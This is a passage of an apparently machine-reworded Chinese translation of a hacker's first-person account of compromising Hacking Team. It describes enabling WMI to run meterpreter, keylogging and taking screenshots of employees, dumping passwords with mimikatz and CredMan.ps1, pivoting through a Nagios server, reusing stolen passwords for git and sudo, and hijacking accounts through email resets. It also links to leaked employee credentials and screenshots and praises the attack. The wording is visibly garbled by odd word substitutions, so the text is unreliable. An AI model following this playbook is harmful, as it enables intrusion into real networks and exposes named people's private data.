sviluppo’区域以及是不是留存任何有效的系统。访问他们的处理器很不难,因为我具备域管理员权限,而他们的电脑则是Windows域中的一有些,所以我得以管理其处理器。uro
罗密欧的微处理器上并从未一个怒放的端口,所以我打开了WMI端口,以便可以实施meterpreter
[3].除了通过Get-Keystrokes 和
Get-提姆edScreenshot模块收集击键音讯和拔取,我还动用过多metasploit
的募集模块,CredMan.ps1 [4],并依照收集的结果进行查找。之后,我看出
Pozzi有一个加密卷,并伺机挂载,所以本身将其复制了一份下来。而那边估计会有许三个人讥笑Christian
Pozzi的弱口令吧(而Christian
Pozzi也终归为大家提供了广大喜剧的资料[6][7][8][9])。最终通过mimikatz
和击键记录工具得到了所有的密码。

 

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/

[2] http://www.hammer-software.com/wmigphowto.shtml

[3] https://www.trustedsec.com/june-2015/no\_psexec\_needed/

[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde

[5] http://pwnwiki.io/\#!presence/windows/find\_files.md

[6] http://archive.is/TbaPy

[7]
http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/

[8]
http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt

[9]
http://hacking.technology/Hacked%20Team/c.pozzi/credentials/

15、桥梁

在Christian
Pozzi的加密卷里面,是一个存放着很多密码的文件文件。其中有一个密码便是Nagios服务器的,而为了对网络开展监察,该服务器是可以访问到‘Rete
Sviluppo’区域的,那样,在单独的互联网之间,就架起了一座桥梁。

16、再利用及重置密码

由此读取邮件,我查看到Daniele
Milan允许访问到git存储库。而本人一度有了他的Windows密码,感激mimikatz。我尝试使用那几个密码登录进git服务器,登录成功!使用它举办sudo,也举行成功!对于她的gitlab服务器和twitter账户,我透过应用“忘记密码”的办法,再通过邮件重置密码。

17、结语

那就是全部经过。轻易渗透进商店,并阻挠其继续破坏人权。那也是黑客的魔力和不对称性之美:只需100时辰的行事,便足以摧毁一个估值数百万韩元的公司数年来的劳作成果。黑客攻击能给予被压迫者去战斗,并取得胜利的力量。

Hacking
Team一向以来视己为意大利共和国的立异点。而我看Vincenzetti,包涵她的铺面,他在官场及处警领域的对象,其人就属于古板的意国法西斯分子。最终,我想把那本指南献给迪亚兹阿曼多校园袭击事件的被害者,以及那么些鲜血洒在意国法西斯手中的人。

网站地图xml地图